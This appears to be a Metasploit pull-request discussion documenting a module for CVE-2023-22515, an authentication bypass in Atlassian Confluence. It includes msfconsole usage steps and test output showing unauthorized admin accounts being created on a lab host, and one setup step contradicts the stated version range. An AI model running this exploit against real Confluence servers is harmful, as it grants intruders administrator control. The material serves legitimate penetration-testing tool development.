CVE-2023-22515 - Atlassian Confluence Data Center and Server Authentication Bypass

[emirpolatt]

Description

This module exploits an Broken Access Control vulnerability in Atlassian Confluence servers leads to Authentication Bypass.

A specially crafted request can be create new admin account without authorization in the Atlassian server.

Vulnerable Application

Affecting Atlassian Confluence from version 8.0.0 to before 8.3.3, from version 8.4.0 before 8.4.3 and from version 8.5.0 before 8.5.2.

Verification Steps

• Setting up a working installation of Atlassian Confluence Server before 8.0.0
• Start msfconsole
• use use auxiliary/admin/http/atlassian_confluence_auth_bypass
• set RHOST <IP>
• set RPORT <PORT>
• check
• You should see The target is vulnerable
• set NEW_USERNAME <username>
• set NEW_PASSWORD <password>
• run
• You should get a new admin account.

Options

• TARGETURI: Path to Atlassian Confluence installation ("/" is the default)
• NEW_USERNAME: Username to be used when creating a new user with admin privileges.
• NEW_PASSWORD: Password to be used when creating a new user with admin privileges.
• NEW_EMAIL: E-mail to be used when creating a new user with admin privileges.

Scenarios

Tested on Confluence Server 8.0.0 with Linux target (Ubuntu 20.04)

msf6 > use auxiliary/multi/http/atlassian_confluence_auth_bypass
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set RHOSTS <YOUR_TARGET>
RHOSTS => <YOUR_TARGET>
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_USERNAME admin_1337
NEW_USERNAME => admin_1337
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_PASSWORD admin_1337
NEW_PASSWORD => admin_1337
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
[*] Running module against <YOUR_TARGET>

[+] Admin user was created successfully. Credentials: admin_1337 - admin_1337
[+] Now you can login as adminstrator from: http://<YOUR_TARGET>:8090/login.action
[*] Auxiliary module execution completed

[adfoster-r7]

@msjenkins-r7 retest this please

[smcintyre-r7]

I gave this a test and ran into a few issues with the #check method. The most important of which was a crash when nil was being returned. I left a few suggestions to address all the problems I noticed.

With those changes in place, everything appears to be working as intended. I tested it against Confluence 8.3.2 on a Windows target.

[smcintyre-r7]

Module looks good to me now, and the tests are showing that it's working as intended now.

Testing Output

In the following output, you'll see that the check method works and then the run method creates the account. When the module is run a second time, it fails because the user was already created. This is expected and reasonable behavior. You'll also see that even after the user creation fails, the check method continues to work which was an issue previously because the setup steps had not be finished.

msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > show options 

Module options (auxiliary/admin/http/atlassian_confluence_auth_bypass):

   Name          Current Setting     Required  Description
   ----          ---------------     --------  -----------
   NEW_EMAIL     [email protected]  yes       E-mail to be used when creating a new user with admin privileges
   NEW_PASSWORD  lzZjyRop            yes       Password to be used when creating a new user with admin privileges
   NEW_USERNAME  gearldine.feeney    yes       Username to be used when creating a new user with admin privileges
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.159.10      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         8090                yes       The target port (TCP)
   SSL           false               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                   yes       Base path
   VHOST                             no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > check
[*] 192.168.159.10:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
[*] Running module against 192.168.159.10

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
[+] Found server-info.action! Trying to ignore setup.
[+] Admin user was created successfully. Credentials: gearldine.feeney - lzZjyRop
[+] Now you can login as administrator from: http://192.168.159.10:8090/login.action
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > check
[*] 192.168.159.10:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
[*] Running module against 192.168.159.10

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
[+] Found server-info.action! Trying to ignore setup.
[-] Auxiliary aborted due to failure: no-access: The admin user could not be created. Try a different username.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > check
[*] 192.168.159.10:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > creds
Credentials
===========

host            origin          service                          public            private   realm  private_type  JtR Format
----            ------          -------                          ------            -------   -----  ------------  ----------
192.168.159.10  192.168.159.10  8090/tcp (Atlassian Confluence)  gearldine.feeney  lzZjyRop         Password      

msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > 

I made some changes in ee0e5b9 to tidy up the docs and fix an issue I noticed where the module would fail when the username contained a capital letter.

[smcintyre-r7]

Release Notes

This adds an exploit for CVE-2023-22515 which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.